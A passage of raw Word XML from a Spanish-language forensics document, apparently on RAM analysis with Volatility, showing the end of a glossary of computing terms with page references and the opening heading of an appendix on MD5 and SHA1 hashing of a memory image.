      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Product ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAA5766" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Identificador único para un producto de software, usado para su gestión y seguimiento.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE7C10B" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Product Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE5866E" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Clave de licencia utilizada para activar software comercial.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46631615" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Proxies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625301AA" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Plural de Proxy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 10, 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2573AF06" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620E51F8" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Servidor que actúa como intermediario para solicitudes de recursos de clientes a otros servidores.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6B7A4C" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683FA254" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Lenguaje de programación de alto nivel conocido por su facilidad de lectura y eficiencia.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · iv, 45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C435FDB" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="Ttulodendice"/>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC1519C" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>RAM (Random Access Memory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6664D404" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Tipo de memoria de computadora donde se almacenan datos temporales y programas en uso.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · ii, 1, 2, 13, 14, 24, 27, 28, 29, 30, 31, 36, 37, 38, 40, 41, 42, 44, 47, 48, 49, 50, 54, 55, 58, 59, 61, 63, 68, 72, 73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45269184" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>RFC (Request for Comments)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A95CA7" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Documentos que describen métodos, comportamientos, investigaciones o innovaciones aplicables a la operación de Internet y sistemas conectados.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · i, 4, 5, 6, 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43545B7E" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>ro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1646CF1C" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Read-only, se refiere a datos o dispositivos que solo pueden ser leídos, no modificados.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358432F3" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA35C96" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>En sistemas Unix y Linux, el usuario con acceso total al sistema.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 44, 46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3523A4D5" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>rw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33775E04" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Read-write, se refiere a datos o dispositivos que pueden ser leídos y escritos/modificados.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055E82BE" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="Ttulodendice"/>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CA6AD9" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Sandbox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1171C6AD" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Entorno de prueba aislado donde se pueden ejecutar programas o archivos sin afectar al sistema principal.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 70, 78</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DF8508" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="Ttulodendice"/>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFF67DD" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>TCP/IP (Transmission Control Protocol/Internet Protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A404899" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Conjunto de protocolos de comunicación utilizados para interconectar dispositivos de red en Internet.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2E0214" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="Ttulodendice"/>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631293B4" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB94372" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Una distribución de Linux basada en Debian, popular por su facilidad de uso.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · iv, 29, 30, 32, 33, 35, 37, 38, 43, 51, 52, 59, 73, 79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105D4B34" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>USB (Universal Serial Bus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661AB4BF" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Estándar de industria para cables, conectores y protocolos de comunicación para la conexión, comunicación y suministro de energía entre computadoras y dispositivos electrónicos.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 18, 19, 35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2994FFB2" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>UserID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54221040" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Identificador único asignado a un usuario de un sistema o red.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 50, 51</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D6571E" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="Ttulodendice"/>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED8FB01" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Volatility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15223ECA" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Herramienta de análisis de memoria forense.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · ii, v, 29, 30, 31, 33, 34, 35, 37, 79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCF94BC" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="Ttulodendice"/>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F89E9D4" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>WSL (Windows Subsystem for Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DC5BAE" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Capa de compatibilidad para ejecutar binarios de Linux de forma nativa en Windows.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 59, 60, 79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307D37AD" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863" w:rsidP="00BD49D1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:sectPr w:rsidR="00D16863" w:rsidSect="00B93CA3">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1701" w:bottom="1418" w:left="1701" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E0605E" w14:textId="16DD7602" w:rsidR="004552FE" w:rsidRDefault="00D16863" w:rsidP="00C9562B">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E97F480" w14:textId="77777777" w:rsidR="00C9562B" w:rsidRPr="00C9562B" w:rsidRDefault="00C9562B" w:rsidP="004C5DDC"/>
    <w:p w14:paraId="2600A70F" w14:textId="32E177E6" w:rsidR="00C9562B" w:rsidRDefault="00C9562B">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D28F14" w14:textId="44C13B51" w:rsidR="004552FE" w:rsidRPr="00C9562B" w:rsidRDefault="004C5DDC" w:rsidP="001D7290">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="164" w:name="_Ref155653758"/>
      <w:bookmarkStart w:id="165" w:name="_Toc155782526"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">II. </w:t>
      </w:r>
      <w:r w:rsidR="001D7290">
        <w:t xml:space="preserve">Comando </w:t>
      </w:r>
      <w:r w:rsidR="00C9562B">
        <w:t>hash MD5 y SHA1 de la memoria RAM.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="164"/>
      <w:bookmarkEnd w:id="165"/>
    </w:p>
    <w:p w14:paraId="0CABDC75" w14:textId="77777777" w:rsidR="004552FE" w:rsidRDefault="004552FE" w:rsidP="004552FE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="051E3C46" w14:textId="6231F2DC" w:rsidR="00C9562B" w:rsidRPr="00C9562B" w:rsidRDefault="00C9562B" w:rsidP="004552FE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF1FB55" w14:textId="50766556" w:rsidR="004552FE" w:rsidRPr="00C9562B" w:rsidRDefault="00C9562B" w:rsidP="004552FE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
